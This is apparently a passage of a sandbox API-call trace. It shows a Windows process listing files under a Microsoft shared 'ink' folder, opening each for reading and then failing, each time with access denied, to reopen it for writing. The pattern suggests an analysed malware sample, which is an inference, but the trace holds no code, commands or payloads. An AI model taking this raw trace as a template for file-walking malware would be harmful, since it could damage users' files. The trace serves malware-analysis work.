RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.806] AreFileApisANSI () returned 1 [0085.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6de98 [0085.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned 62 [0085.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.807] GetFileType (hFile=0x35c) returned 0x1 [0085.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.807] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.807] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.807] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.807] CloseHandle (hObject=0x35c) returned 1 [0085.807] AreFileApisANSI () returned 1 [0085.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0085.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned 62 [0085.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.808] GetLastError () returned 0x5 [0085.808] GetLastError () returned 0x5 [0085.808] SetLastError (dwErrCode=0x5) [0085.808] GetLastError () returned 0x5 [0085.808] SetLastError (dwErrCode=0x5) [0085.808] GetLastError () returned 0x5 [0085.808] SetLastError (dwErrCode=0x5) [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0085.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.808] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x6ebfe576, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x17a00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.809] AreFileApisANSI () returned 1 [0085.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll", lpUsedDefaultChar=0x0) returned 61 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.809] AreFileApisANSI () returned 1 [0085.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0085.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6df20 [0085.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned 61 [0085.809] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.930] GetFileType (hFile=0x424) returned 0x1 [0085.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.930] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.930] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.930] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.930] CloseHandle (hObject=0x424) returned 1 [0085.931] AreFileApisANSI () returned 1 [0085.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0085.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e2d8 [0085.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned 61 [0085.931] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.931] GetLastError () returned 0x5 [0085.931] GetLastError () returned 0x5 [0085.931] SetLastError (dwErrCode=0x5) [0085.931] GetLastError () returned 0x5 [0085.931] SetLastError (dwErrCode=0x5) [0085.931] GetLastError () returned 0x5 [0085.931] SetLastError (dwErrCode=0x5) [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.931] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0085.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0085.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0085.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0085.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.932] AreFileApisANSI () returned 1 [0085.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR", lpUsedDefaultChar=0x0) returned 57 [0085.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0085.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.932] AreFileApisANSI () returned 1 [0085.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 57 [0085.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.932] GetLastError () returned 0x5 [0085.932] GetLastError () returned 0x5 [0085.932] SetLastError (dwErrCode=0x5) [0085.932] GetLastError () returned 0x5 [0085.933] SetLastError (dwErrCode=0x5) [0085.933] GetLastError () returned 0x5 [0085.933] SetLastError (dwErrCode=0x5) [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.933] AreFileApisANSI () returned 1 [0085.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 57 [0085.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.933] GetLastError () returned 0x5 [0085.933] GetLastError () returned 0x5 [0085.933] SetLastError (dwErrCode=0x5) [0085.933] GetLastError () returned 0x5 [0085.933] SetLastError (dwErrCode=0x5) [0085.933] GetLastError () returned 0x5 [0085.933] SetLastError (dwErrCode=0x5) [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0085.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0085.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0085.934] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.934] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78950 [0085.934] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.934] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0085.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0085.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 